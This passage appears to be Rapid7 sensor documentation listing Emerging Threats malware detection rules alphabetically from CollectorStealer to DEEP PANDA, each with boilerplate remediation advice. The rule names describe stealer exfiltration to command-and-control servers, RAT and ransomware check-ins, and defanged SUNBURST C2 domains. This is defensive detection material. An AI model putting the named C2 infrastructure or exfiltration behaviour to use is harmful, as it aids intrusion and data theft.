ET MALWARE CollectorStealer CnC Exfil

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Comfoo Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Comfoo Outbound Communication

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE CommentCrew downloader without user-agent string exe download without User Agent

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE CommentCrew Possible APT backdoor download logo.png

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Common Downloader Access Count Tracking URL

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Common Downloader Install Count Tracking URL

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Common Downloader Install Count Tracking URL (partner)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Common Downloader Install Report URL

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Common Downloader Install Report URL (farfly checkin)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Common Downloader Install Report URL (pid - mac)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Common Downloader Install Report URL (wmid - ucid)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Common Trojan HTTP GET Logging

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Common Upatre Header Structure 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Common Upatre Header Structure 3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Common Upatre URI/Headers Struct

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Common Zbot EXE filename Dec 09 2013

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE COMRAT CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ConstructorWin32/Agent.V

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE contacy.info Trojan Checkin (User agent clk_jdfhid)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Cookies/Cookiebag Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Corebot Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Corebot Module Download

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Corebot Module Download 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Corebot Requesting Module

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE CoreDn CnC Checkin M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE CoreDn CnC Checkin M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Covenant Framework HTTP Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE CozyCar CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE CozyCar V2 CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE CozyDuke APT HTTP GET CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE CozyDuke APT HTTP POST CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Criptobit/Mobef Ransomware Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE CROSSWALK CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE CrownAdPro CnC Activity M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE CrownAdPro CnC Activity M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE CrownAdPro CnC Activity M3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE CrownAdPro CnC Activity M4

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE CrownAdPro CnC Activity M5

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Cryptojoker Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Cryptolocker Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE CryptoLocker EXE Download

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE CryptoLuck / YafunnLocker Ransomware CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE CryptoPatronum Ransomware CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE CryptoShield Ransomware Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Cryptowall 2.0 DL URI Struct Oct 2 2014

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE CryptoWall Check-in

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE CryptoWall Check-in M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE CryptoWall CryptoWall 3.0 Check-in

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE CSharp SMB Scanner Assembly in PowerShell Inbound M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE CSharp SMB Scanner Assembly in PowerShell Inbound M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Curso Banker Downloading Modules

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE CyberGate RAT Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE CyberGate RAT User-Agent (USER_CHECK)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Cyborg Ransomware - Downloading Desktop Background

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Cycbot POST

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE D1onis Stealer Sending Data to CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DADJOKE/Rail Tycoon Initial Macro Execution

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DADJOKE/Rail Tycoon Payload Execution

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DADJOKE/Rail Tycoon Payload Extraction

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Daemonize.ft HTTP Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Dalexis CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Dalexis Downloading EXE

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Danabot Associated Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Danabot CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Danabot UA Observed

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DarkGate CNC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DarkGate CnC Requesting Data Exfiltration from Bot

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Dark Halo/SUNBURST CnC Domain (globalnetworkissues .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Dark Halo/SUNBURST CnC Domain (kubecloud .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Dark Halo/SUNBURST CnC Domain (lcomputers .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Dark Halo/SUNBURST CnC Domain (seobundlekit .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Dark Halo/SUNBURST CnC Domain (solartrackingsystem .net in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Dark Halo/SUNBURST CnC Domain (webcodez .com in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Dark Halo/SUNBURST SSL Cert Inbound (globalnetworkissues .com)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Dark Halo/SUNBURST SSL Cert Inbound (kubecloud .com)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Dark Halo/SUNBURST SSL Cert Inbound (lcomputers .com)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Dark Halo/SUNBURST SSL Cert Inbound (seobundlekit .com)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Dark Halo/SUNBURST SSL Cert Inbound (solartrackingsystem .net)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Dark Halo/SUNBURST SSL Cert Inbound (webcodez .com)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DarkHotel Downloader CnC Beacon 1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE DarkHotel Downloader CnC Beacon 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE DarkHotel Initial Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE DarkHotel Payload Uploading to CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Darkness DDoS Bot Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Dark Nexus IoT Variant User-Agent (Outbound)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Databack CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DATA-BROKER BOT Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Datoploader Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Datoploader Activity M2 (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DCRAT Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DCRat CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DCRat CnC Activity M11

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DCRat CnC Activity M12

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DCRat CnC Activity M13

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DCRat Initial CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Ddex Loader Check-in

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DDG Botnet CnC Job Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DDG Botnet CnC Slave POST

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DDG Botnet Miner Download

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DDoS.XOR Checkin 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DDoS.XOR Checkin 3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DDoS.XOR Checkin via HTTP

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DeathStalker/Janicab CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DeathStalker/Powersing CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DecebalPOS User-Agent

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DecryptmyFiles Ransomware CnC (POST)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE DEEP PANDA Checkin 1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DEEP PANDA Checkin 2

Description
Copy link

